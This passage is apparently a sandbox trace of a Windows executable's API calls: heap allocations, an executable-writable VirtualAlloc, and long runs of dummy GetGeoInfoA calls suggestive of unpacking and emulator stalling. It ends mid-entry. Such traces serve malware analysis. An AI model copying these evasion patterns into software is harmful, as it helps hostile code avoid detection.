[0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.588] SetLastError (dwErrCode=0x0) [0109.588] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x0, Size=0x70) returned 0x4921990 [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.589] SetLastError (dwErrCode=0x0) [0109.589] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.590] SetLastError (dwErrCode=0x0) [0109.590] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.591] SetLastError (dwErrCode=0x0) [0109.591] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.592] SetLastError (dwErrCode=0x0) [0109.592] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.593] GetLastError () returned 0x0 [0109.593] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.594] SetLastError (dwErrCode=0x0) [0109.594] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.595] SetLastError (dwErrCode=0x0) [0109.595] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.596] SetLastError (dwErrCode=0x0) [0109.596] GetLastError () returned 0x0 [0109.597] SetLastError (dwErrCode=0x0) [0109.597] GetLastError () returned 0x0 [0109.597] SetLastError (dwErrCode=0x0) [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x98) returned 0x4921a08 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x1f) returned 0x4921aa8 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x36) returned 0x4921ad0 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x37) returned 0x4921b10 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x3c) returned 0x4921b50 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x31) returned 0x4921b98 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x17) returned 0x4921bd8 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x24) returned 0x4921bf8 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x14) returned 0x4921c28 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0xd) returned 0x4921c48 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x25) returned 0x4921c60 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x39) returned 0x4921c90 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x18) returned 0x4921cd8 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x17) returned 0x4921cf8 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0xe) returned 0x4921d18 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x69) returned 0x4921d30 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x3e) returned 0x4921da8 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x1b) returned 0x4921df0 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x1d) returned 0x4921e18 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x48) returned 0x4921e40 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x12) returned 0x4921e90 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x18) returned 0x4921eb0 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x1b) returned 0x4921ed0 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x24) returned 0x4921ef8 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x29) returned 0x4921f28 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x1e) returned 0x4921f60 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x41) returned 0x4921f88 [0109.597] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x17) returned 0x4921fd8 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0xf) returned 0x4921ff8 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x16) returned 0x4922010 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x2a) returned 0x4922030 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x29) returned 0x4922068 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x15) returned 0x49220a0 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x1e) returned 0x49220c0 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x2a) returned 0x49220e8 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x12) returned 0x4922120 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x18) returned 0x4922140 [0109.598] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x46) returned 0x4922160 [0109.598] HeapFree (in: hHeap=0x4920000, dwFlags=0x0, lpMem=0x49211f8 | out: hHeap=0x4920000) returned 1 [0109.598] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0109.598] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0109.598] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0109.599] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x800) returned 0x49221b0 [0109.599] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0x8, Size=0x80) returned 0x49211f8 [0109.599] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4096ac) returned 0x0 [0109.601] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49211f8) returned 0x80 [0109.601] GetLastError () returned 0x0 [0109.601] SetLastError (dwErrCode=0x0) [0109.601] GetLastError () returned 0x0 [0109.601] SetLastError (dwErrCode=0x0) [0109.601] GetLastError () returned 0x0 [0109.601] SetLastError (dwErrCode=0x0) [0109.601] GetLastError () returned 0x0 [0109.601] SetLastError (dwErrCode=0x0) [0109.601] GetLastError () returned 0x0 [0109.601] SetLastError (dwErrCode=0x0) [0109.601] GetLastError () returned 0x0 [0109.601] SetLastError (dwErrCode=0x0) [0109.601] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.602] SetLastError (dwErrCode=0x0) [0109.602] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.603] SetLastError (dwErrCode=0x0) [0109.603] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.604] SetLastError (dwErrCode=0x0) [0109.604] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.605] SetLastError (dwErrCode=0x0) [0109.605] GetLastError () returned 0x0 [0109.607] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0109.607] lstrlenA (lpString="") returned 0 [0109.607] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0109.607] VirtualAlloc (lpAddress=0x0, dwSize=0x90d50, flAllocationType=0x1000, flProtect=0x40) returned 0x220000 [0109.610] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.612] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.613] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] 